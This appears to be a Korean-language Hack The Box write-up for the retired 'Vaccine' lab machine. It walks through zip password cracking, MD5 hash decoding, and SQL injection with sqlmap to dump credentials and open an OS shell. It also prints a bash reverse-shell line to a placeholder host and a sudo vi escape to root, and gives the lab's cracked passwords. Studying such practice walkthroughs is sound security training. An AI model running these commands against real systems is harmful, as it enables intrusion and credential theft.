[HTB]Hack The Box - Vaccine:: Write up

1. Reconnaissance

21,22,80/tcp 포트가열려있습니다. 

먼저 이전 BOX에서 ftp에 관한 계정정보를 얻은 바 있습니다.

해당 계정정보로 FTP에 접속하여 파일을 검색해보니, Backup.zip 파일이 존재했고, get 명령어로 내 서버로 받아왔습니다.

2. Initial Access

그러나 이 파일을 unzip 하려면 비밀번호가 필요합니다. zip 파일의 비밀번호에 대한 힌트는 따로 없었으니, 크래킹 도구를 이용해 비밀번호를 크랙했습니다.

3. Execution

크랙 툴과 rockyou.txt(Brute force 공격에 사용되는 passwordlist file)을 이용해 크랙해보겠습니다.

zip 비밀번호는 741852963 이었습니다 !! 이제 압축 해제를 해보겠습니다.

 

압축파일 안에 index.php 가 있었고, 그 안에 admin의 비밀번호가 코딩되어있습니다.[md5로 암호화 된 상태]

https://www.md5online.org/md5-decrypt.html

MD5 Online | Free MD5 Decryption, MD5 Hash Decoder

위 사이트에서 decrpyt를 해보면, qwerty789 라는 admin의 비밀번호를 알 수 있습니다.

이제 admin / qwerty789라는 계정정보를 가지고 10.10.10.46:80 웹서버로 접속해 로그인을 하면, 뭔가 데이터를 출력해주는 화면이 나옵니다. 아래 사진과 같이 search 파라미터에서 sql injection 취약점이 터지는 것을 확인했습니다

 

해당 파라미터에 sqlmap을 이용하여 DB 정보를 추출했습니다.

SQLMAP PAYLOAD :

sqlmap -u "10.10.10.46/dashboard.php?search=test" --cookie="PHPSESSID=1mnugjg6sisr4tijrprmssnu1k" -D pg_catalog -T pg_authid --dump

pg_authid 테이블에서 postgres라는 계정과 md5 해시값의 비밀번호를 찾았습니다. 아마 ssh 접속을 위한 계정인 것으로 보입니다. 

 

저 패스워드를 UNHASH 하여 ssh 접속해도 되지만, 저는 sqlmap 의 --os-shell 명령어로 sqlmap 에서 바로 쉘을 열었습니다.

SQLMAP PAYLOAD :

sqlmap -u "10.10.10.46/dashboard.php?search=test" --cookie="PHPSESSID=1mnugjg6sisr4tijrprmssnu1k" --os-shell

 

sqlmap 으로 열린 쉘은 불편하기 때문에, 

bash -c 'bash -i ?>& /dev/tcp/IPADDRESS/PORT 0&>1' 

명령어를 쳐서 제 서버쪽으로 리버스쉘을 열고 서버를 탐색했습니다.

/var/www/html/dashboard.php 파일에 db 접속을 위한 계정과 패스워드가 있었습니다 뚜둔

해당 계정과 비밀번호로 ssh 접속 후 sudo -l 명령어를 통해 해당 유저가 관리자 권한으로 실행할 수 있는 파일을 열거했습니다.

4. Privilege Escalation

vi 와 pg_hba.conf 파일을 관리자 권한으로 실행할 수 있습니다. vi 에서 명령어 실행이 가능하므로, vi pg_hba.conf 로 해당 파일을 열고 :/bin/bash 를 입력하면 관리자 권한의 쉘이 열릴 것입니다.

 

sudo vi /etc/postgresql/11/main/pg_hba.conf 로 파일을 열고 커맨드 모드에서 :!/bin/bash로 쉘 명령을 입력하면, sudo로 실행했기 때문에 루트쉘이 열리게 됩니다 !